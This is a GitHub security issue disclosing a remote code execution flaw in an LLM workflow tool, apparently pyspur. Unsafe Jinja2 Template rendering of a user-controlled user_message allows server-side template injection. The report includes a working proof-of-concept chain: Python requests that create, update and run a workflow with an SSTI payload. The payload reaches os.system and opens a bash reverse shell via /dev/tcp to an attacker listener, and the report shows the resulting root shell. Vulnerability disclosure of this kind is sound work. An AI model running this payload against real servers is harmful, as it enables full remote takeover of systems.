Skip to content

[Security] RCE with Template of jinja2 #289

@Arashimu

Description

@Arashimu

RCA

Some Node subclasses that inherit BaseNode have overridden the run method, but there are unsafe uses of Template in them. such as SingleLLMCallNode class

class SingleLLMCallNode(BaseNode):
    async def run(self, input: BaseModel) -> BaseModel:
        # Grab the entire dictionary from the input
        raw_input_dict = input.model_dump()

        # Render system_message
        system_message = Template(self.config.system_message).render(raw_input_dict)

        try:
            # If user_message is empty, dump the entire raw dictionary
            if not self.config.user_message.strip():
                user_message = json.dumps(raw_input_dict, indent=2)
            else:
                user_message = Template(self.config.user_message).render(**raw_input_dict)    # [1]
        except Exception as e:
            print(f"[ERROR] Failed to render user_message {self.name}")
            print(f"[ERROR] user_message: {self.config.user_message} with input: {raw_input_dict}")
            raise e

[1] self.config.user_message can be controlled by user, so this allows user to execute arbitrary code in server.

POC

  1. create workflow
import requests

url = "http://192.168.133.128:6080/api"


def create_workflow(name, description = ""):
    request_body = {
        "name": name,
        "description": description,
    }

    rep = requests.post(f'{url}/wf', json=request_body)
    print(rep.text)

'''
{"id":"S2","name":"test1 2025-05-27 03:08:05","description":"","definition":{"nodes":[{"id":"input_node","title":"input_node","parent_id":null,"node_type":"InputNode","config":{"output_schema":{"input_1":"string"},"output_json_schema":"{\"type\": \"object\", \"properties\": {\"input_1\": {\"type\": \"string\"} } }","has_fixed_output":false,"enforce_schema":false},"coordinates":{"x":100.0,"y":100.0},"dimensions":null,"subworkflow":null}],"links":[],"test_inputs":[],"spur_type":"workflow"},"created_at":"2025-05-27T03:08:05.160335","updated_at":"2025-05-27T03:08:05.160337"}
'''

we can get the workflow id S2
2. update it

import requests

url = "http://192.168.133.128:6080/api"


body = {
    "name": "S2",
    "description": "",
    "definition": {
    "nodes": [
        {
            "id": "input_node",
            "title": "input_node",
            "parent_id": None,
            "node_type": "InputNode",
            "config": {
                "output_schema": {
                    "text": "str"
                },
                "enforce_schema": False,
                "output_json_schema": "{\n  \"type\": \"object\",\n  \"required\": [\n    \"text\"],\n  \"properties\": {\n    \"text\": {\n      \"type\": \"str\"\n    }}"
            },
            "coordinates": {
                "x": 0.0,
                "y": 280.5
            },
            "dimensions": {
                "width": 300.0,
                "height": 167.0
            },
            "subworkflow": None
        },
        {
            "id": "ContentAnalysis",
            "title": "ContentAnalysis",
            "parent_id": None,
            "node_type": "SingleLLMCallNode",
            "config": {
                "title": "ContentAnalysis",
                "type": "object",
                "output_schema": {
                    "frames": "array",
                    "musicAnalysis": "object"
                },
                "llm_info": {
                    "model": "gemini/gemini-1.5-flash",
                    "max_tokens": 8192,
                    "temperature": 0.7,
                    "top_p": 1
                },
                "system_message": "Analyze this video and provide the following:\n\n1. A list of timestamped frames at 1-second intervals, including:\n\n   - Detailed visual description of each frame\n\n   - Continuity references to previous frames when applicable\n\n   - In-depth descriptions of people (age, gender, appearance)\n\n   - Identification of text as \"text hook\" (start), \"CTA\" (end), or \"CTA\" (middle)\n\n   - Types of scene transitions used\n\n   - Presence and timing of brand elements (logos, product shots)\n\n   - Notable camera angles or movements\n\n   - Transcription of the voiceover\n\n   - Include any sound effects\n\n   - Include characteristics of the voiceover (tone, pitch, emotion)\n\n2. Music analysis:\n\n   - Presence of music (true/false)\n\n   - If true, identify the song or describe the style of music\n\nPlease format the output clearly, separating each section for easy readability.",
                "user_message": "{% for x in ().__class__.__base__.__subclasses__() %}{% if 'warning' in x.__name__ %}{{x()._module.__builtins__['__import__']('os').system('/bin/bash -c \"bash -i >& /dev/tcp/192.168.133.128/8888 0>&1\"')}}{%endif%}{% endfor %}",
                "few_shot_examples": None,
                "url_variables": {
                    "file": "input_node.video_file"
                },
                "output_json_schema": "{\n  \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n  \"title\": \"Video Analysis Schema\",\n  \"type\": \"object\",\n  \"properties\": {\n    \"frames\": {\n      \"type\": \"array\",\n      \"description\": \"List of timestamped frames at 1-second intervals\",\n      \"items\": {\n        \"type\": \"object\",\n        \"properties\": {\n          \"timestamp\": {\n            \"type\": \"integer\",\n            \"description\": \"Timestamp of the frame in seconds\"\n          },\n          \"visualDescription\": {\n            \"type\": \"string\",\n            \"description\": \"Detailed visual description of the frame\"\n          },\n          \"continuityReferences\": {\n            \"type\": \"string\",\n            \"description\": \"References to or from previous frames for continuity\"\n          },\n          \"people\": {\n            \"type\": \"array\",\n            \"description\": \"In-depth descriptions of people appearing in the frame\",\n            \"items\": {\n              \"type\": \"object\",\n              \"properties\": {\n                \"age\": {\n                  \"type\": \"string\",\n                  \"description\": \"Approximate age or age group\"\n                },\n                \"gender\": {\n                  \"type\": \"string\",\n                  \"description\": \"Observed gender presentation\"\n                },\n                \"appearance\": {\n                  \"type\": \"string\",\n                  \"description\": \"Description of clothing, hair, notable features, etc.\"\n                }\n              },\n              \"required\": [\"age\", \"gender\", \"appearance\"]\n            }\n          },\n          \"textIdentification\": {\n            \"type\": \"string\",\n            \"description\": \"Type of text on screen, if any\",\n            \"enum\": [\n              \"none\",\n              \"text hook (start)\",\n              \"CTA (middle)\",\n              \"CTA (end)\"\n            ]\n          },\n          \"sceneTransitionType\": {\n            \"type\": \"string\",\n            \"description\": \"Type of transition between scenes (e.g., cut, fade, wipe)\"\n          },\n          \"brandElements\": {\n            \"type\": \"array\",\n            \"description\": \"Any brand logos or products appearing along with their timing\",\n            \"items\": {\n              \"type\": \"object\",\n              \"properties\": {\n                \"brandElement\": {\n                  \"type\": \"string\",\n                  \"description\": \"Type of brand element (logo, product shot, etc.)\"\n                },\n                \"appearanceTime\": {\n                  \"type\": \"integer\",\n                  \"description\": \"The time (in seconds) the brand element appears\"\n                }\n              },\n              \"required\": [\"brandElement\", \"appearanceTime\"]\n            }\n          },\n          \"cameraAnglesOrMovements\": {\n            \"type\": \"string\",\n            \"description\": \"Notable camera angles or movements (e.g., close-up, panning)\"\n          },\n          \"voiceoverTranscription\": {\n            \"type\": \"string\",\n            \"description\": \"Transcribed voiceover content for this frame's time range\"\n          },\n          \"voiceoverCharacteristics\": {\n            \"type\": \"object\",\n            \"description\": \"Characteristics of the voiceover\",\n            \"properties\": {\n              \"tone\": {\n                \"type\": \"string\",\n                \"description\": \"General tone of the voiceover (e.g., friendly, dramatic)\"\n              },\n              \"pitch\": {\n                \"type\": \"string\",\n                \"description\": \"Pitch or register of the speaker’s voice\"\n              },\n              \"emotion\": {\n                \"type\": \"string\",\n                \"description\": \"Notable emotion(s) conveyed in voiceover\"\n              }\n            },\n            \"required\": [\"tone\", \"pitch\", \"emotion\"]\n          },\n          \"soundEffects\": {\n            \"type\": \"array\",\n            \"description\": \"List of any notable sound effects heard during this frame\",\n            \"items\": {\n              \"type\": \"string\"\n            }\n          }\n        },\n        \"required\": [\"timestamp\", \"visualDescription\"]\n      }\n    },\n    \"musicAnalysis\": {\n      \"type\": \"object\",\n      \"description\": \"Analysis of music presence and identification\",\n      \"properties\": {\n        \"presenceOfMusic\": {\n          \"type\": \"boolean\",\n          \"description\": \"Indicates whether music is present in the video\"\n        },\n        \"songOrStyleDescription\": {\n          \"type\": \"string\",\n          \"description\": \"If music is present, name the song or describe the style\"\n        }\n      },\n      \"required\": [\"presenceOfMusic\"]\n    }\n  },\n  \"required\": [\"frames\", \"musicAnalysis\"]\n}\n"
            },
            "coordinates": {
                "x": 438.0,
                "y": 0.0
            },
            "dimensions": {
                "width": 300.0,
                "height": 150.0
            },
            "subworkflow": None
        }
    ],
    "links": [
        {
            "source_id": "input_node",
            "target_id": "ContentAnalysis",
            "source_handle": None,
            "target_handle": None
        }
    ],
    "test_inputs": [
        {
            "id": 1738339574226,
            "text": "hello"
        }
    ]
}
}

rep = requests.put(f'{url}/wf/S2', json=body)
print(rep.text)
  1. run the workflow
import requests

url = "http://192.168.133.128:6080/api"

request = {
    "initial_inputs": {"input_node": {"text": "hello"}}
}
rep = requests.post(f'{url}/wf/S2/run', json=request)
print(rep.text)

before running the 3th step,run the command as follow in other shell:

test@virtual-machine:~/AI/pyspur$ ncat -v -l 8888
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888

after running the 3th step, we can get a reverse shell

test@virtual-machine:~/AI/pyspur$ ncat -v -l 8888
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.25.0.3.
Ncat: Connection from 172.25.0.3:46416.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@10e9644ec2b0:/pyspur/backend# ls
ls
alembic.ini
data
entrypoint.sh
llms-ctx.txt
log_conf.yaml
output_files
pyproject.toml
pyspur
sqlite
test_ollama.sh

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions